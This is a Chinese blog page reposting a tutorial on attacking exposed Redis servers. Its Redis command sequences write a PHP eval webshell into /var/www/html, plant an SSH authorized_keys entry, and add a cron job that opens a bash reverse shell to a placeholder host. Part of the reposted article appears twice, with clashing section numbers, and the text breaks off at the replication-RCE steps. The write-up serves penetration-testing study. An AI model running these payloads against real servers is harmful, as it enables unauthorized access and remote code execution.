<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="redis攻击总结, wa1ki0g,blog,github">
    <meta name="description" content="redis攻击总结redis的那几种攻击方式在这几年的赛题还是实战中几乎已经被玩烂了，原理也就那些东西，主要就是通信的RESP协议，所以再总结感觉也可能也学不到太多东西，所以就直接看了xq17师傅的文章感觉写的很好就直接转载了xq17师傅的">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>redis攻击总结 | wa1ki0g‘s blog</title>
    <link rel="icon" type="image/png" href="/favicon.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 5.4.1">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css"></head>



   <style>
    body{
       background-image: url(https://s3.bmp.ovh/imgs/2021/11/89588faa2bede843.jpeg);
       background-repeat:no-repeat;
       background-size: 100% 100%;
       background-attachment:fixed;
    }
</style>



<body>
    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/0.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">wa1ki0g‘s blog</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/contact" class="waves-effect waves-light">
      
      <i class="fas fa-comments" style="zoom: 0.6;"></i>
      
      <span>留言板</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/0.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">wa1ki0g‘s blog</div>
        <div class="logo-desc">
            
            天行健，君子以自强不息！
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/contact" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-comments"></i>
			
			留言板
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
    </ul>
</div>


        </div>

        
    </nav>

</header>

    



<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/featureimages/5.jpg')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">redis攻击总结</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                          <div class="article-tag">
                            <span class="chip bg-color">无标签</span>
                          </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2022-02-24
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2022-02-24
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    5.9k
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    23 分
                </div>
                

                
            </div>
        </div>
        <hr class="clearfix">

        

        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h2 id="redis攻击总结"><a href="#redis攻击总结" class="headerlink" title="redis攻击总结"></a>redis攻击总结</h2><p>redis的那几种攻击方式在这几年的赛题还是实战中几乎已经被玩烂了，原理也就那些东西，主要就是通信的RESP协议，所以再总结感觉也可能也学不到太多东西，所以就直接看了xq17师傅的文章感觉写的很好就直接转载了xq17师傅的文章，但是师傅这里写错了一个问题，就是redis在高版本中module load出错的原因不是exp的不规范，而是在高版本中增加了相关的权限验证，详情在<a target="_blank" rel="noopener" href="https://github.com/redis/redis/pull/6257">https://github.com/redis/redis/pull/6257</a> 这个commit里面</p>
<p>注：以下内容原创来自于xq17师傅，侵权可删<br>链接：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7974#toc-10">https://xz.aliyun.com/t/7974#toc-10</a></p>
<h2 id="0x0-前言"><a href="#0x0-前言" class="headerlink" title="0x0 前言"></a><strong>0x0 前言</strong></h2><p>  Redis在内网渗透中常常扮演着重要的角色，其攻击方式非常多样化，在内网复杂的环境架构中容易出现各种问题，那么如何有效利用Redis的缺陷来达到我们的目的呢,这里笔者结合一些实操场景和大师傅们的文章做了一些分析和总结。</p>
<h2 id="0x1-Redis的简介"><a href="#0x1-Redis的简介" class="headerlink" title="0x1 Redis的简介"></a>0x1 Redis的简介</h2><p>Redis是C语言开发一个开源(遵循BSD)协议高性能的(key-value)键值对的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀，支持持久化到硬盘且高可用)，由于其自身特点，可以广泛应用在数据集群，分布式队列，信息中间件等网络架构中，在内网渗透的突破中，常常扮演getshell的角色，</p>
<h2 id="0x2-常见的利用方式"><a href="#0x2-常见的利用方式" class="headerlink" title="0x2 常见的利用方式"></a>0x2 常见的利用方式</h2><p>这里我简单说一下Redis容易遭受的攻击点,而这些点本身就是软件设计便捷理念。</p>
<p>redis为了系统的移植方便，多集群的快速部署，在3.2.0之前默认都是无密码，对外暴露6379的</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span>docker run <span class="token operator">--</span>name redis <span class="token operator">-</span>p6379<span class="token operator">:</span><span class="token number">6379</span> <span class="token operator">-</span>d redis<span class="token operator">:</span><span class="token number">3.0</span> 
<span class="token number">2</span><span class="token punctuation">.</span>redis<span class="token operator">-</span>cli x<span class="token punctuation">.</span>x<span class="token punctuation">.</span>x<span class="token number">.123</span> 
<span class="token number">3</span><span class="token punctuation">.</span>config get requirepass
# docker部署默认都是以redis权限执行的。
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/1d7fee2337d64c8e8a978b5485b1df0e.png" alt="在这里插入图片描述"></p>
<p>可以看到默认对外开放且无密码的。</p>
<p>但是在3.2.0之后增加了一个保护模式，默认还是无密码，但是限制了只有本地(回环接口)才能访问。</p>
<p>总的来说,问题还是出在了无密码校验经常被钻空子,比如ssrf,用来权限提升等等,下面会说到。</p>
<p>然后Redis自身提供了一个config的命令,用来实现备份功能，然后备份的文件名和备份的路径都可以通过</p>
<pre class=" language-java"><code class="language-java">config set dbfilename
config set dir
</code></pre>
<p>来控制,从而可以实现任意文件写功能。</p>
<h2 id="0x2-1-信息泄露"><a href="#0x2-1-信息泄露" class="headerlink" title="0x2.1 信息泄露"></a>0x2.1 信息泄露</h2><p>这个比较鸡肋,简单提提</p>
<p>redis 有个info的命令,返回关于 Redis 服务器的各种信息和统计数值。<br><img src="https://img-blog.csdnimg.cn/12228b486dd244a78f373e555d2864ff.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>config get *也会泄露一些信息</p>
<p><img src="https://img-blog.csdnimg.cn/773f52917fcf4f81a18272e327598364.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<h2 id="0x2-2-写webshell"><a href="#0x2-2-写webshell" class="headerlink" title="0x2.2 写webshell"></a>0x2.2 写webshell</h2><p>这种情况一般大都是出在了root权限执行的redis中,或者是以某个web服务来启动的redis，从而对web目录具有了可写的权限。</p>
<p>这个操作网上的payload其实很多都有风险性,一些不懂redis的小白就很容易误操作。</p>
<pre class=" language-java"><code class="language-java">flushall
set <span class="token number">1</span> <span class="token string">'&lt;?php eval($_GET["cmd"]);?>'</span>
config set dir <span class="token operator">/</span>var<span class="token operator">/</span>www<span class="token operator">/</span>html
config set dbfilename shell<span class="token punctuation">.</span>php
save
</code></pre>
<p>最终生成一个redis数据库快照,里面包含了数据内容写到dbfilename设置的路径中。<br><img src="https://img-blog.csdnimg.cn/08a70ef1cd3748628cac89969e3da914.png" alt="在这里插入图片描述"><br>里面有个flushall命令会清空所有缓存数据,这个在一定程度不会造成巨大的损失，但是会给业务体验带来影响。</p>
<p>redis 默认数据库有16个:</p>
<pre class=" language-java"><code class="language-java">config get databases
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/c2ac676a3dd24b18aa6afe68b9acdeaf.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>默认保存的是当前数据库下内容,所以我们完全不用flushall来清空默认0号的数据库内容</p>
<p>我们只需这样子select 去切换其他的空数据库,然后就可以了。</p>
<pre class=" language-java"><code class="language-java">select <span class="token number">5</span>
set <span class="token number">1</span> <span class="token string">'&lt;?php eval($_POST["cmd"]);?>'</span>
config set dir <span class="token operator">/</span>var<span class="token operator">/</span>www<span class="token operator">/</span>html
config set dbfilename shell<span class="token punctuation">.</span>php
save
</code></pre>
<p>比如:</p>
<p>keys *(这个最好别用,输出量很容易把环境崩掉)</p>
<p>可以考虑用dbsize</p>
<p><img src="https://img-blog.csdnimg.cn/eae353737d004508b1f78f5afb74823b.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>我们就可以选择第5号数据库来执行操作,根本不需要进行fluashall的高危操作。</p>
<p>这里可以看到save命令保存下来的文件，其实因为是数据库备份为快照文件所以存在一定格式(脏数据),但是由于PHP解析的松散性,这些都不影响php的执行。‘</p>
<h2 id="0x2-3-写入SSH-免密登录"><a href="#0x2-3-写入SSH-免密登录" class="headerlink" title="0x2.3 写入SSH 免密登录"></a>0x2.3 写入SSH 免密登录</h2><p>这个场景主要应用在没有web应用的服务器，redis一般都是与web分离的，故这种方式我个人觉得还是很棒的，在linux系统都存在/root目录也不会被改动,笔者觉得这种方式还是可以接受的。</p>
<p>如centos:(这个没有登录过root,没有没有.ssh文件夹，问题不大)</p>
<p><img src="https://img-blog.csdnimg.cn/6233932d5b0049e5abab73b7508c95ca.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<p>浅析Linux下Redis的攻击面(一)</p>
<p>xq17 / 2020-07-13 09:46:22 / 浏览数 9985 安全技术 众测渗透顶(0) 踩(0)<br>浅析Linux下Redis的攻击面(一)<br>0x0 前言<br>  Redis在内网渗透中常常扮演着重要的角色，其攻击方式非常多样化，在内网复杂的环境架构中容易出现各种问题，那么如何有效利用Redis的缺陷来达到我们的目的呢,这里笔者结合一些实操场景和大师傅们的文章做了一些分析和总结。</p>
<p>0x1 Redis的简介<br>官方简介: Introduction to Redis</p>
<p>我的理解:</p>
<p>Redis是C语言开发一个开源(遵循BSD)协议高性能的(key-value)键值对的内存NoSQL数据库,可以用作数据库、缓存、信息中间件(性能非常优秀，支持持久化到硬盘且高可用)，由于其自身特点，可以广泛应用在数据集群，分布式队列，信息中间件等网络架构中，在内网渗透的突破中，常常扮演getshell的角色，</p>
<p>0x2 Redis环境的搭建<br>我们可以去官网看看:</p>
<p><a target="_blank" rel="noopener" href="https://redis.io/download">https://redis.io/download</a></p>
<p>这里我们可以学习一下Redis的版本控制方式:</p>
<p>Redis uses a standard practice for its versioning: major.minor.patchlevel. An even minor marks a stable release, like 1.2, 2.0, 2.2, 2.4, 2.6, 2.8. Odd minors are used for unstable releases, for example 2.9.x releases are the unstable versions of what will be Redis 3.0 once stable.</p>
<p>可以看到1.2.3,这样的格式,其中1是大版本，2是小改动，3是bug修复，其中 2中的数字，Odd(奇数)代表的是不稳定的发行版，而Even(偶数)代表是稳定的发行版。</p>
<p>目前Redis 稳定版已经更新redis6.0,在实际的实战中，一般不会那么高，包括我自己用的，普遍都是4.x-5.x,有的甚至更低。</p>
<p>在官网中提供了多种安装方式,有手工编译的，也有docker的， 笔者由于是重度docker玩家，所以主选docker这种方式，其实原因主要还是卸载方便和基于Ubuntu环境比较贴近实战环境(笔者是MacOS环境)。</p>
<p>但是为了方便分析版本差异,也通过编译源码的方式来运行一些版本。</p>
<p>redis全部版本源码</p>
<p>这里为了研究差异,笔者分别安装了3个版本的环境用来测试:</p>
<p>4.x版本的环境: vulhub 4.0.14</p>
<p>1.git clone <a target="_blank" rel="noopener" href="https://github.com/vulhub/vulhub.git">https://github.com/vulhub/vulhub.git</a><br>2. cd ./vulhub/redis/4-unacc<br>3.docker-compose up -d<br>5.x版本的环境:</p>
<p>这里选取redis官方的镜像版本</p>
<p>docker pull redis:5.0.9<br>通过观察官方镜像的dockerfile文件</p>
<p>RUN groupadd -r -g 999 redis &amp;&amp; useradd -r -g redis -u 999 redis<br>RUN mkdir /data &amp;&amp; chown redis:redis /data<br>可以看到创建了一个专门用于程序运行的系统账号。</p>
<p>运行:</p>
<p>docker run –name redis5 -p6379:6379 -d  redis:5.0.9<br>远程ubunut环境安装管理包的redis4.0.9(用来模拟常见的情况,一般linux及其都是以root权限运行很多程序的)</p>
<p>apt-get install redis-server</p>
<p>然后以root用户启动的,只能用bind的ip，external ip是会被拒绝的。</p>
<p>0x3 常见的利用方式<br>redis 安全问题可以参考:</p>
<p>1.A few things about Redis security</p>
<p>2.Redis安全</p>
<p>这里我简单说一下Redis容易遭受的攻击点,而这些点本身就是软件设计便捷理念。</p>
<p>redis为了系统的移植方便，多集群的快速部署，在3.2.0之前默认都是无密码，对外暴露6379的</p>
<p>1.docker run –name redis -p6379:6379 -d redis:3.0<br>2.redis-cli x.x.x.123<br>3.config get requirepass</p>
<h1 id="docker部署默认都是以redis权限执行的。"><a href="#docker部署默认都是以redis权限执行的。" class="headerlink" title="docker部署默认都是以redis权限执行的。"></a>docker部署默认都是以redis权限执行的。</h1><p>可以看到默认对外开放且无密码的。</p>
<p>但是在3.2.0之后增加了一个保护模式，默认还是无密码，但是限制了只有本地(回环接口)才能访问。</p>
<p>总的来说,问题还是出在了无密码校验经常被钻空子,比如ssrf,用来权限提升等等,下面会说到。</p>
<p>然后Redis自身提供了一个config的命令,用来实现备份功能，然后备份的文件名和备份的路径都可以通过</p>
<p>config set dbfilename<br>config set dir<br>来控制,从而可以实现任意文件写功能。</p>
<p>0x3.1 信息泄露<br>这个比较鸡肋,简单提提</p>
<p>redis 有个info的命令,返回关于 Redis 服务器的各种信息和统计数值。</p>
<p>config get *也会泄露一些信息</p>
<p>0x3.2 写webshell<br>这种情况一般大都是出在了root权限执行的redis中,或者是以某个web服务来启动的redis，从而对web目录具有了可写的权限。</p>
<p>这个操作网上的payload其实很多都有风险性,一些不懂redis的小白就很容易误操作。</p>
<p>flushall<br>set 1 ‘<!--?php eval($_GET["cmd"]);?-->‘<br>config set dir /var/www/html<br>config set dbfilename shell.php<br>save<br>最终生成一个redis数据库快照,里面包含了数据内容写到dbfilename设置的路径中。</p>
<p>里面有个flushall命令会清空所有缓存数据,这个在一定程度不会造成巨大的损失，但是会给业务体验带来影响。</p>
<p>redis 默认数据库有16个:</p>
<p>config get databases<br>127.0.0.1:6380[2]&gt; config get databases</p>
<ol>
<li>“databases”</li>
<li>“16”</li>
</ol>
<p>127.0.0.1:6380[2]&gt;</p>
<p>默认保存的是当前数据库下内容,所以我们完全不用flushall来清空默认0号的数据库内容</p>
<p>我们只需这样子select 去切换其他的空数据库,然后就可以了。</p>
<p>select 5<br>set 1 ‘<!--?php eval($_POST["cmd"]);?-->‘<br>config set dir /var/www/html<br>config set dbfilename shell.php<br>save<br>比如:</p>
<p>keys *(这个最好别用,输出量很容易把环境崩掉)</p>
<p>可以考虑用dbsize</p>
<p>我们就可以选择第5号数据库来执行操作,根本不需要进行fluashall的高危操作。</p>
<p>这里可以看到save命令保存下来的文件，其实因为是数据库备份为快照文件所以存在一定格式(脏数据),但是由于PHP解析的松散性,这些都不影响php的执行。</p>
<h2 id="0x3-3-写入SSH-免密登录"><a href="#0x3-3-写入SSH-免密登录" class="headerlink" title="0x3.3 写入SSH 免密登录"></a>0x3.3 写入SSH 免密登录</h2><p>这个场景主要应用在没有web应用的服务器，redis一般都是与web分离的，故这种方式我个人觉得还是很棒的，在linux系统都存在/root目录也不会被改动,笔者觉得这种方式还是可以接受的。</p>
<p>如centos:(这个没有登录过root,没有没有.ssh文件夹，问题不大)</p>
<p><img src="https://img-blog.csdnimg.cn/03f62626553d4e16949bc931f8938729.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"></p>
<p>如ubuntu:<br><img src="https://img-blog.csdnimg.cn/52bce61905ab45f99f919ba9e122cbb2.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>可以看到可行性还是可圈可点的。</p>
<p>写入过程:</p>
<pre class=" language-java"><code class="language-java">ssh<span class="token operator">-</span>keygen <span class="token operator">-</span>t rsa
# 然后指定目录生成<span class="token number">2</span>个文件 私钥<span class="token operator">:</span>id_rsa 公钥<span class="token operator">:</span>id_rsa<span class="token punctuation">.</span>pub
</code></pre>
<p>这里要注意下数据库内容的决定是否要使用flushall</p>
<p>这里为了保证写入的authorized_key能被解析,必须引入换行符(ubuntu亲测,要不然是不会成功)</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span><span class="token punctuation">(</span>echo <span class="token operator">-</span>e <span class="token string">"\n\n"</span><span class="token punctuation">;</span> cat id_rsa<span class="token punctuation">.</span>pub<span class="token punctuation">;</span> echo <span class="token operator">-</span>e <span class="token string">"\n\n"</span><span class="token punctuation">)</span> <span class="token operator">></span> temp<span class="token punctuation">.</span>txt
<span class="token number">2</span><span class="token punctuation">.</span>cat temp<span class="token punctuation">.</span>txt <span class="token operator">|</span> redis<span class="token operator">-</span>cli <span class="token operator">-</span>p <span class="token number">6380</span>  <span class="token operator">-</span>x set <span class="token number">1</span>
</code></pre>
<p>然后按正常操作即可</p>
<pre class=" language-java"><code class="language-java"><span class="token number">1</span><span class="token punctuation">.</span> config set dir <span class="token operator">/</span>root<span class="token operator">/</span><span class="token punctuation">.</span>ssh<span class="token operator">/</span>
<span class="token number">2</span><span class="token punctuation">.</span> config set dbfilename authorized_keys
<span class="token number">3</span><span class="token punctuation">.</span>save
</code></pre>
<p>尝试连接下:</p>
<pre class=" language-java"><code class="language-java">ssh root<span class="token annotation punctuation">@139</span><span class="token punctuation">.</span>X<span class="token punctuation">.</span>X<span class="token punctuation">.</span>X <span class="token operator">-</span>i id_rsa
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/3a10b803146e486f9edda77699540c3e.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>PS (一些疑惑):</p>
<p>网上搜了一些文章说，因为默认的话是不允许开启通过开启密钥来登录。</p>
<p>默认在/etc/ssh/sshd_config中不开启</p>
<p>`#PubkeyAuthentication yes</p>
<p>所以会导致没办法登录,但是我在测试的过程中发现，默认直接写入也可以直接登录。</p>
<p>测试过几台机器都是生产环境上的云机器,都是这样直接写入就可以登录。</p>
<h2 id="0x2-4-写入计划任务反弹shell"><a href="#0x2-4-写入计划任务反弹shell" class="headerlink" title="0x2.4 写入计划任务反弹shell"></a>0x2.4 写入计划任务反弹shell</h2><p>这个点其实蛮鸡肋，因为在debian、ubuntu等环境中由于这些环境对计划任务的格式解析非常严格是没办法执行成功,但是这个比前面那个比较好，主要是在centos环境的环境下默认root是可以通过这个方法拿到反弹shell的,所以还是指的说说的。</p>
<p><strong>1.ubuntu无法利用的原因</strong></p>
<pre class=" language-java"><code class="language-java"><span class="token operator">/</span>etc<span class="token operator">/</span>crontab，脏数据解析失败
<span class="token operator">/</span>var<span class="token operator">/</span>spool<span class="token operator">/</span>cron<span class="token operator">/</span>crontabs<span class="token operator">/</span>root，redis默认写入<span class="token number">644</span>非<span class="token number">600</span>，提示失败
</code></pre>
<p><strong>Centos下的利用</strong><br>实现命令:</p>
<pre class=" language-java"><code class="language-java">set <span class="token number">1</span> <span class="token string">'\n\n*/1 * * * * bash -i >&amp; /dev/tcp/X.X.X.X/7789 0>&amp;1\n\n'</span>
config set dir <span class="token operator">/</span>var<span class="token operator">/</span>spool<span class="token operator">/</span>cron<span class="token operator">/</span>
config set dbfilename root
save
</code></pre>
<p>查看定时任务执行状态:</p>
<pre class=" language-java"><code class="language-java">tail <span class="token operator">-</span>f vim <span class="token operator">/</span>var<span class="token operator">/</span>log<span class="token operator">/</span>cron
</code></pre>
<p>这个我建议在尝试尝试完ssh之后,如果失败了，再结合判断是不是centos机器(实际概率比较大)</p>
<p>再尝试这个。</p>
<h2 id="0x2-5-写入高冗余数据"><a href="#0x2-5-写入高冗余数据" class="headerlink" title="0x2.5 写入高冗余数据"></a>0x2.5 写入高冗余数据</h2><p>当我们写入的内容是属于高冗余的数据时，redis默认会采用LZF压缩的方式来写入数据。</p>
<pre class=" language-java"><code class="language-java">压缩：Redis默认采用LZF算法对生成的RDB文件做压缩处理，压缩后的文件远远小于内存大小，默认开启，可以通过参数config setrdbcompression<span class="token punctuation">{</span>yes<span class="token operator">|</span>no<span class="token punctuation">}</span>动态修改。
</code></pre>
<p><img src="https://img-blog.csdnimg.cn/5fc5b4d47abb48f4b014d623a099b8a6.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAd2Exa2kwZ34=,size_20,color_FFFFFF,t_70,g_se,x_16" alt="在这里插入图片描述"><br>这个时候我们就会出现一些奇怪的错误,</p>
<p>debug起来相当麻烦</p>
<p>解决思路:关闭压缩功能。</p>
<pre class=" language-java"><code class="language-java">config set rdbcompression no
</code></pre>
<p>然后再保存即可。</p>
<h2 id="0x2-6-低版本redis-无损写文件"><a href="#0x2-6-低版本redis-无损写文件" class="headerlink" title="0x2.6 低版本redis 无损写文件"></a>0x2.6 低版本redis 无损写文件</h2><p><a target="_blank" rel="noopener" href="https://github.com/r35tart/RedisWriteFile">RedisWriteFile</a></p>
<p>这个能实现无损写文件,如果权限够高，也可以尝试下，因为无损写文件原理主从同步，从redis2.8开始，module模块加载是从redis4.0开始的，所以在低版本的redis，或许会有一些作用，但是我遇到的环境比较少，感觉linux下作用真的不大,简单提提。</p>
<h2 id="0x3-主从复制RCE"><a href="#0x3-主从复制RCE" class="headerlink" title="0x3 主从复制RCE"></a>0x3 主从复制RCE</h2><h2 id="0x3-1-主从复制的介绍"><a href="#0x3-1-主从复制的介绍" class="headerlink" title="0x3.1 主从复制的介绍"></a>0x3.1 主从复制的介绍</h2><p><strong>(1)简单说明</strong></p>
<p>这个攻击方式是LC/BC的成员Pavel Toporkov在2019年7月7日结束的WCTF2019 Final分享出来的,可以说这个技术，为redis的攻击撕开了一个全新的口子,打就是rce获取的就是redis运行的权限，比之前那些需要高权限的方法来的更加普遍和使用。</p>
<p><strong>(2)通俗原理</strong></p>
<p>两个点:</p>
<p>(1) 支持传输备份文件</p>
<p>(2)支持加载so链接库，拓展命令</p>
<pre class=" language-java"><code class="language-java">第一步，我们伪装成redis数据库，然后受害者将我们的数据库设置为主节点。
第二步，我们设置备份文件名为so文件
第三步，设置传输方式为全量传输
第四步加载恶意so文件，实现任意命令执行
</code></pre>
<p>这里重点是实现全量传输:</p>
<p>全量传输是将数据库备份文件整个传输过去，然后从节点清空内存数据库，将备份文件加载到数据库中。</p>
<p>具体的实现步骤:</p>
